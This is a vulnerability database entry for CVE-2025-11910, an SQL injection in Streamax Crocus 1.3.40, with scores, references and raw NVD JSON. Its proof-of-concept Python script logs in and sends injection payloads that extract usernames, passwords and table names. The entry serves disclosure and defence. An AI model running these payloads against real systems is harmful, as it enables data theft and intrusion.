CVE-2025-11910

Description

A security vulnerability has been detected in Shenzhen Ruiming Technology Streamax Crocus 1.3.40. This affects the function Query of the file /MemoryState.do?Action=Query. The manipulation of the argument orderField leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:streamax:streamax_crocus:1.3.40:*:*:*:*:*:*:* - VULNERABLE

Streamax Crocus 1.3.40

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11910 PoC - Streamax Crocus SQL Injection
# Vulnerability: SQL Injection via orderField parameter in /MemoryState.do?Action=Query
# Author: Security Researcher
# Affected Version: Streamax Crocus 1.3.40

import requests

TARGET_URL = "http://target-host"
USERNAME = "low_privilege_user"
PASSWORD = "password123"

# Step 1: Login to obtain session cookie
session = requests.Session()
login_url = f"{TARGET_URL}/login.do"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
response = session.post(login_url, data=login_data)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Exploit SQL injection via orderField parameter
# The vulnerable endpoint: /MemoryState.do?Action=Query
# The orderField parameter is directly concatenated into SQL query
vulnerable_endpoint = f"{TARGET_URL}/MemoryState.do?Action=Query"

# Payload examples for SQL injection via orderField
payloads = [
    # Basic injection test
    "id;SELECT 1--",
    # UNION-based injection to extract data
    "id UNION SELECT username,password FROM users--",
    # Boolean-based blind injection
    "id AND 1=1",
    "id AND 1=2",
    # Time-based blind injection
    "id;WAITFOR DELAY '0:0:5'--",
    # Extract database version
    "id UNION SELECT @@version,NULL--",
    # Extract table names
    "id UNION SELECT table_name,NULL FROM information_schema.tables--"
]

for i, payload in enumerate(payloads):
    params = {
        "orderField": payload,
        "page": "1",
        "rows": "10"
    }
    print(f"\n[*] Testing payload {i+1}: {payload}")
    response = session.get(vulnerable_endpoint, params=params)
    print(f"[*] Response status: {response.status_code}")
    print(f"[*] Response length: {len(response.text)}")
    if "error" not in response.text.lower():
        print(f"[+] Possible successful injection! Response preview:")
        print(response.text[:500])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11910
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11910
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11910/
[4] VulDB https://vuldb.com/cve/CVE-2025-11910
[5] https://github.com/FightingLzn9/vul/blob/main/%E6%B7%B1%E5%9C%B3%E5%B8%82%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AF%E8%82%A1%E4%BB%BD%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8Crocus%E7%B3%BB%E7%BB%9F-3.md
[6] https://vuldb.com/?ctiid.328920
[7] https://vuldb.com/?id.328920
[8] https://vuldb.com/?submit.671437

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11910", "sourceIdentifier": "[email protected]", "published": "2025-10-17T20:15:36.817", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Shenzhen Ruiming Technology Streamax Crocus 1.3.40. This affects the function Query of the file /MemoryState.do?Action=Query. The manipulation of the argument orderField leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:streamax:streamax_crocus:1.3.40:*:*:*:*:*:*:*", "matchCriteriaId": "9BE97623-A1D4-407D-88A8-8E204CFC39D2"}]}]}], "references": [{"url": "https://github.com/FightingLzn9/vul/blob/main/%E6%B7%B1%E5%9C%B3%E5%B8%82%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AF%E8%82%A1%E4%BB%BD%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8Crocus%E7%B3%BB%E7%BB%9F-3.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328920", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328920", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671437", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}